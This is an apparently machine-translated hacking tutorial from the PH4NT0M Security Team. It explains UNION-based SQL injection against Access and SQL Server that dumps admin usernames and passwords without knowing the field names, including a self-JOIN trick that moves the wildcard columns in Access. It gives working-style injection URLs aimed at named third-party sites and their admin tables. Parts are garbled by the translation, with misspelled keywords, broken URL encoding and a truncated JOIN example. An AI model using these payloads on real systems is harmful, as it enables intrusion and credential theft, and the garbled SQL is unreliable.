Get database data of Access, SQL Server, etc., PH4NT0M Security Teamhttp: //www.ph4nt0m.org
When using SQL injecting Access, you often encounter a password to be Chinese, guess the key field name. Use this technology to solve such problems quickly. There are two minimum requirements for this technology:
1. Use the system of the Access database exists in SQL injection vulnerability; the MSSQL database also supports this technology 2. Need to know the table name of the table where you want to explosive data and a field name in this table, usually the ID field
The advantage of using this technology apparent is:
1. You may not need 'quotation marks, filter' quotes. This technology does not affect 2. You can quickly know the content of sensitive data, and don't have to slowly susceptive, Chinese, special characters, etc. in the past, 3. In SQL Server blocks the error message, can still get sensitive data contents after the error message 4. You can still get the information in the case of not knowing the critical (desired data) field name.
It's hard to see this technology, it is actually very simple. There are two difficulties, the first difficult point is easy to think of seeing the results, but the second difficulty is a bit trouble.
First look at a form, it is the syntax of Union. This is also the main principle of exploding data. As shown below:
When we use SQL INJECT technology to insert a UNION statement, as long as the number of columns obtained by the two Select queries is the same, after the entire SQL statement is completed, the resulting query result has become the data obtained after the union. So it is possible to explode the data we need. Look at a simple example:
Http://www.chinj.com/softview.asp?softid=3903 Union Select USERNAME, Password, 1,1,1,10020from Admin
This is a server server, closes the return of the error message, so it is not possible to obtain sensitive data directly according to the previous method. After inserting the UNION statement through SQL INJECT, you can guess the SQL statement that the executed is turned to:
Select * from soft where softid = 3903 Union Select UserName, Password, 1,1,1 from admin
Then display the Soft 1, 2 fields in normal conditions, it is dedicated to the place where admin's UserName and Password fields are displayed, and the three 1 of the following is also interplanted. According to this feature, we can certainly get the username and password fields inside the admin_userinfo table. The structure of the structure is as follows:
http://www.chinj.com/softview.asp?softid=3903 Union Select USERNAME, Password, 1,1,1,11 from ADMIN_USERINFO where USERNAME <> ''
The above is a simple use of Union to achieve acquisition of sensitive data without separating complex violent disassembly. In order to achieve the purpose of the data that is not known to the field name, we should certainly think of using * instead of the field name. As long as the field represented by * plus a few 1 number of 1, the number of fields in the SELECT query table in the script is the same, then the data that does not know the word name can also be obtained.
Considering such a situation, there is such a statement: SELECT ID, HIT, SOFTNAME, SOFTURL from Soft where id = 10. The fields that can be displayed normally in the web page are SoftName and SoftURL, then we should adjust * location when using UNION, the structure in the general admin table is ID username password, then injecting the hypothetical sentence You should construct SQL statements like this: SELECT 1, * from admin. Make * instead of the UserName and Pssword fields in SoftName and SoftURL, such web pages can be allowed to make us want UserName and Password fields. Of course, this is just the simplest example to explain that there will be a dozen fields in a table, I have the longest forty-three fields. Then use SELECT * in the script to do inquiry, we should use 1 to 43 fields in constructing UNION SELECT. Of course, there will be some fields that are not displayed by the web page, which needs to consider the location of the * number behind the UNION SELECT. I believe this should have to say more. The syntax that said above is fully compliant with SQL Server. However, Access and SQL Server are really a little witch. In SQL Server, when we use SELECT *, 1, 1, 1 from admin statement query, the record set is: * 1 1 1. However, the result of this statement query in Access is 1 1 1 *, that is, no matter what the * is in the middle of this group 1, * The data represented is always at the end of the query results. Examples of a complex point for explanation:
http://www.hnp2p.com/mov/view.asp?id=1916 Union (select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16% 20From% 20ADMIN)
This site uses the Access database, you can see the fields that can be displayed normally 2, 3, 7, 8, 10, 11, but the back field is not displayed, remove 14, 15, 16 to replace * The page also displays a number, that is, the number of fields in admin is three, and it is definitely the structure of the ID username password, but in addition to the other fields in the ID field cannot be gueled. The location of the * number is moved in accordance with the method used in the SQL Server in SQL Server, and the sensitive data can be exploded, and it is not feasible in Access. The reason is that access always places the field instead of the query data set. The results of Access query will always be: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * this look. In order to expose the field instead of *, we must move the field instead of the * to other locations. First look at:
http://www.hnp2p.com/mov/view.asp?id=1916 20Union Select 1,4 From ((( (Admin AS A INNNER Join Admin AS B%) 20A% 20A.ID = B.ID)% 20INNNER% 20JOIN% 20ADMIN% 20A% 20C% 20on% 20c.id = B.ID)% 20 iD.ID = C. ID)% 20INNNER% 20Join% 20Admin% 20AS% 20E% 20on% 20D.ID = E.ID
Through the execution of the statement, the final query obtained is 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 161, A. ID A.NAME A.PWD B.ID B.NAME B.PWD C.ID C.Name C.PWD D.ID D.Name D.PWD E.ID E.NAME E.PWD Among them, the 3rd and 7th fields are just the value we want UserName and Password fields. Here I am using the Join syntax, connect two tables (add) to construct such a query result that satisfies our requirements.
Join is divided into all connections, left connections, and right connections, and the specific difference can be viewed to view the SQL syntax. Here, in ACCESS, we choose which connection mode effect is equivalent to all connections. Look at a simple Join syntax
Select * from (Table 1 INNER JOIN Table 2 ON Table 1. Sequence number = Table 2. Serial number) Inner Join table 3 ON Table 1. Serial number = Table 3. Serial number
Convert to instance is:
SELECT 1, 2, 3, 4, * from A.ID = B.ID) Inner Join Admin as c on C.ID = B.ID) Inner Join Admin AS D on D.ID = C.ID
According to this format, you can solve the SQL statement that the above URL is truly executed, nothing more than constant use of join connection data table admin, and then fill the number of fields in front. As long as the statement is constructed, then you don't know that the data of the field name can be displayed in the page. This is the difficulty of this technology.
Ok, all will be introduced. It is also very possible if you want to write this technology into a program. It's best to use the human brain when the statement structure is constructed ~~~ huh
